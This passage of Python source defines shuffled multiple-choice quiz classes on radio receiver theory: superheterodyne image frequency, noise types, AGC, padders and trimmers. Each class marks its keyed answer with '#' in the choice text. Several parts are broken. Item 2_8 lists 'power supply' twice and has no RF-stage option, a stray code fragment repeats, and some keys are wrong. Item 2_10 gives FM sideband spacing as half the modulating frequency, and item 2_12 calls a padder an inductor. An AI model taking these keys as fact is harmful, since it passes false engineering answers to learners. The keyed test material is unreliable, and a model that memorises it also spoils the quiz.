{choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_15():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'will increase'\n\t\tchoice_b = 'will decrease #'\n\t\tchoice_c = 'will remain constant'\n\t\tchoice_d = 'will reduce to a negligible value'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"It is known that noise phase modulates the FM wave. As the noise side band frequency approaches the carrier frequency, the noise amplitude will\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_16():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'demodulator #'\n\t\tchoice_b = 'loudspeaker'\n\t\tchoice_c = 'audio amplifier'\n\t\tchoice_d = 'frequency changer'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a receiver, which of the following devices has IF input but no RF output?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_17():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Resistance noise'\n\t\tchoice_b = 'Partition noise #'\n\t\tchoice_c = 'Flicker noise'\n\t\tchoice_d = 'Shot noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Transistors are free from which type of noise?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_18():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'MF #'\n\t\tchoice_b = 'HF'\n\t\tchoice_c = 'VHF'\n\t\tchoice_d = 'UHF'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Standard AM radio broadcasts are confined to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_19():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the highest AGC voltage is produced between stations'\n\t\tchoice_b = 'the faster the AGC time constant, the more accurate the output'\n\t\tchoice_c = 'an increase in signal strength produces more AGC #'\n\t\tchoice_d = 'the audio stage gain is normally controlled by the AGC'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver with simple AGC\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_20():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Complete phase-shift generator'\n\t\tchoice_b = 'Product Detector'\n\t\tchoice_c = 'Diode Balanced Modulator'\n\t\tchoice_d = 'Bipolar Transistor Balanced Modulator #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following cannot be used to demodulate SSB?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"
\n\nclass ece_radio_receivers_section_1_21():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'carrier frequencies'\n\t\tchoice_b = 'audio frequencies'\n\t\tchoice_c = 'radio frequencies #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A transmitter aerial current contains\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_22():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '24.09 MHz'\n\t\tchoice_b = '24.54 MHz'\n\t\tchoice_c = '25.45 MHz'\n\t\tchoice_d = '25.91 MHz #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a broadcast superheterodyne receiver having no RF amplifier, the loaded Q of the antenna coupling circuit is 100. If the intermediate frequency is 455 kHz, the image frequency at 25 MHz will be\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_23():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'at the transmitter'\n\t\tchoice_b = 'in the channel #'\n\t\tchoice_c = 'at the information source'\n\t\tchoice_d = 'at the destination'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a communication system, noise is likely to affect the signal\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_24():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'absolute temperature #'\n\t\tchoice_b = '(absolute temperature)^2'\n\t\tchoice_c = '1 / (absolute temperature)'\n\t\tchoice_d = '1 / sqrt(absolute temperature)'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The noise produced by a resistor is proportional to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_25():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'selectivity will be poor #'\n\t\tchoice_b = 'tracking difficulties will be least'\n\t\tchoice_c = 'adjacent channel rejection will improve'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver, if the intermediate frequency is too high\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_26():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1655 kHz'\n\t\tchoice_b = '2110 kHz #'\n\t\tchoice_c = '745 kHz'\n\t\tchoice_d = '910 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a superheterodyne receiver, the IF is 455 kHz. If it is tuned to 1200 kHz, the image frequency will be at\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"
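\n\n# Helper sketch (illustrative only, not referenced by the question classes):\n# several questions above rely on the image-frequency relation f_si = f_s + 2*f_i.\ndef image_frequency(f_signal, f_intermediate):\n\t# e.g. image_frequency(1200, 455) == 2110 and image_frequency(1200, 450) == 2100, in kHz\n\treturn f_signal + 2 * f_intermediate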
\n\nclass ece_radio_receivers_section_1_27():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'sensitivity'\n\t\tchoice_b = 'characteristics of the IF section #'\n\t\tchoice_c = 'antenna direction '\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The selectivity of most receivers is determined largely by\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_28():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '750 kHz'\n\t\tchoice_b = '990 kHz'\n\t\tchoice_c = '1650 kHz'\n\t\tchoice_d = '2100 kHz #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A superheterodyne receiver with an IF of 450 kHz is tuned to a signal at 1200 kHz. The image frequency is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_29():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1.116 #'\n\t\tchoice_b = '1.386'\n\t\tchoice_c = '2.116'\n\t\tchoice_d = '2.386'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a broadcast superheterodyne receiver having no RF amplifier, the loaded Q of the antenna coupling circuit is 100. If the intermediate frequency is 455 kHz, the rejection ratio at 25 MHz will be\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_1_31():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'high gain and high sensitivity #'\n\t\tchoice_b = 'better selectivity at higher frequencies'\n\t\tchoice_c = 'stability'\n\t\tchoice_d = 'noise suppression'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"As compared to tuned radio frequency receivers, which of the following is an advantage of using superheterodyne receivers?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_32():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Image frequency rejection will improve'\n\t\tchoice_b = 'selectivity will be too sharp #'\n\t\tchoice_c = 'the frequency selectivity of the local oscillator will have to be lowered'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver, if the intermediate frequency is too low\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_33():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'discard the carrier'\n\t\tchoice_b = 'facilitate tracking #'\n\t\tchoice_c = 'filter the input signal'\n\t\tchoice_d = 'suppress noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Padders are used in a receiver to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"
\n\nclass ece_radio_receivers_section_1_34():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'lower than the incoming frequency'\n\t\tchoice_b = 'higher than the incoming frequency #'\n\t\tchoice_c = 'equal to the incoming frequency'\n\t\tchoice_d = 'any of the situations'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver, the local oscillator is tuned to a frequency \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_35():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'colpitts'\n\t\tchoice_b = 'clapp'\n\t\tchoice_c = 'armstrong #'\n\t\tchoice_d = 'ultra'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following oscillators is generally not used at VHF?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_36():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '114 kohms'\n\t\tchoice_b = '336 kohms #'\n\t\tchoice_c = '384 kohms'\n\t\tchoice_d = '455 kohms'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"An unmodulated voltage of 10 V effective is applied to a diode detector in which the load resistance is 4 x 10^5 ohms. A microammeter shows that the rectified DC current in this resistance is 30 uA. The input resistance of the detector is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_1_37():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'DC voltage'\n\t\tchoice_b = 'modulating signal'\n\t\tchoice_c = 'RF ripple'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The output of a diode detector contains\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_38():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'partition noise #'\n\t\tchoice_b = 'shot noise'\n\t\tchoice_c = 'flicker noise'\n\t\tchoice_d = 'resistance noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following types of noise does not occur in transistors?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_1_39():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'partition noise'\n\t\tchoice_b = 'white noise'\n\t\tchoice_c = 'thermal noise #'\n\t\tchoice_d = 'shot noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Noise generated in a resistor is also known as \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"
\n\nclass ece_radio_receivers_section_1_40():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'variable tuning inductor'\n\t\tchoice_b = 'ganged tuning inductor #'\n\t\tchoice_c = 'variable capacitor'\n\t\tchoice_d = 'variable preset'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following is used to provide tracking between the RF amplifier and local oscillator stages of a receiver?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_41():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'its ability to reject unwanted signals #'\n\t\tchoice_b = 'its ability to amplify weak signals'\n\t\tchoice_c = 'the frequency at which it gives maximum amplification to the signal'\n\t\tchoice_d = 'its ability to suppress noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The selectivity of a radio receiver is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_42():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'instability will occur'\n\t\tchoice_b = 'heterodyne whistles will be heard'\n\t\tchoice_c = 'tuning to the frequency band immediately adjacent to the intermediate frequency will become impossible'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"If the intermediate frequency of a superheterodyne falls within the tuning range of the receiver\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_43():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'audio amplifiers'\n\t\tchoice_b = 'RF amplifier'\n\t\tchoice_c = 'full wave rectifier'\n\t\tchoice_d = 'magic eye #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The EM 84 tube is used in radio receivers as\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_1_44():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Double conversion is used to improve image rejection'\n\t\tchoice_b = 'Double conversion is used to improve selectivity'\n\t\tchoice_c = 'Variable sensitivity is used to improve selectivity'\n\t\tchoice_d = 'Variable sensitivity is used to eliminate selective fading #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following statements about receivers is false?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_45():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'increases with modulating signal power'\n\t\tchoice_b = 'decreases with modulating signal power'\n\t\tchoice_c = 'is independent of the modulating signal power #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Modulated carrier power in FM\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"
\n\nclass ece_radio_receivers_section_1_46():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'detect the modulating signal'\n\t\tchoice_b = 'amplify the received modulated carrier'\n\t\tchoice_c = 'shift the frequency of the received modulated carrier to the IF band #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In superheterodyne receivers, the local oscillator is used to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_47():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'demodulator'\n\t\tchoice_b = 'AGC'\n\t\tchoice_c = 'IF amplifier #'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following is the same in AM and FM receivers?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_48():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'reduce receiver gain at some specific frequency #'\n\t\tchoice_b = 'increase receiver gain at some specific frequency'\n\t\tchoice_c = 'make selectivity more precise'\n\t\tchoice_d = 'spread the bandwidth'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A notch filter is sometimes used in communication receivers to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_49():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'noise figure'\n\t\tchoice_b = 'noise temperature'\n\t\tchoice_c = 'input noise voltage #'\n\t\tchoice_d = 'equivalent noise resistance'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which one of the following is not a useful quantity for comparing the noise performance of receivers?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_50():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'leak type bias must be used'\n\t\tchoice_b = 'output must be tuned'\n\t\tchoice_c = 'the circuit is always biased in class C, by virtue of leak type bias #'\n\t\tchoice_d = 'when the input increases past the threshold of limiting, the gain decreases to keep the output constant'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following statements about the limiter is not valid?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_1():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'reduce interfering noise due to ignition system'\n\t\tchoice_b = 'reduce noise due to electrical storms'\n\t\tchoice_c = 'reduce interference due to electrical machinery'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A noise limiter is provided on AM receivers to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"
\n\nclass ece_radio_receivers_section_2_2():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'diagonal clipping'\n\t\tchoice_b = 'poor AGC operation'\n\t\tchoice_c = 'poor AF response'\n\t\tchoice_d = 'negative peak clipping #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A low ratio of the AC load impedance to the DC load impedance of a diode detector results in\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_3():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'insulator'\n\t\tchoice_b = 'inductor'\n\t\tchoice_c = 'capacitor #'\n\t\tchoice_d = 'variable resistor'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A trimmer is basically a \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_4():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'all stages contribute equally to noise'\n\t\tchoice_b = 'RF stage has no effect on S/N ratio'\n\t\tchoice_c = 'mixer stage contributes most of the noise generated #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_5():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'highest at the midrange frequency and lower at other frequencies #'\n\t\tchoice_b = 'lower at midrange and higher at the low and high frequencies'\n\t\tchoice_c = 'relatively uniform at all frequencies'\n\t\tchoice_d = 'very high at the extremes and very low at midrange frequencies'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which curve represents the fidelity curve of a standard receiver?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_6():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the gain of the IF amplifier'\n\t\tchoice_b = 'the gain of the RF amplifier'\n\t\tchoice_c = 'the noise figure'\n\t\tchoice_d = 'all of the above #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The sensitivity of a superheterodyne receiver is determined by\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_7():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the local oscillator frequency is made higher than the incoming signal frequency #'\n\t\tchoice_b = 'the local oscillator frequency is made lower than the incoming signal frequency'\n\t\tchoice_c = 'the local oscillator frequency is made equal to the incoming signal frequency'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"
{choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_8():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'mixer stage'\n\t\tchoice_b = 'power supply'\n\t\tchoice_c = 'power supply #'\n\t\tchoice_d = 'equally from above three'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver, the maximum contribution to noise if from\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_9():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'is constant with frequency #'\n\t\tchoice_b = 'increases with frequency'\n\t\tchoice_c = 'decreases with frequency'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Power spectral density of white noise\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_10():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'four times the modulating frequency'\n\t\tchoice_b = 'twice the modulating frequency'\n\t\tchoice_c = 'half the modulating frequency #'\n\t\tchoice_d = 'modulating frequency'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a FM waveform, the side bands are spaced at intervals equal to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_11():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '5870'\n\t\tchoice_b = '3655'\n\t\tchoice_c = '236 #'\n\t\tchoice_d = '13.3'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A receiver having an RF amplifier and an IF of 450 kHz, has Q of the coils 65 and an incoming frequency 1200 kHz, the image rejection of the receiver is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_12():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'insulator'\n\t\tchoice_b = 'variable resistance'\n\t\tchoice_c = 'capacitor'\n\t\tchoice_d = 'inductor #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A padder is basically a/an\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_13():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'facilitate tracking'\n\t\tchoice_b = 'allow permit adequate frequency coverage without switching #'\n\t\tchoice_c = 'facilitate image frequency rejection'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, 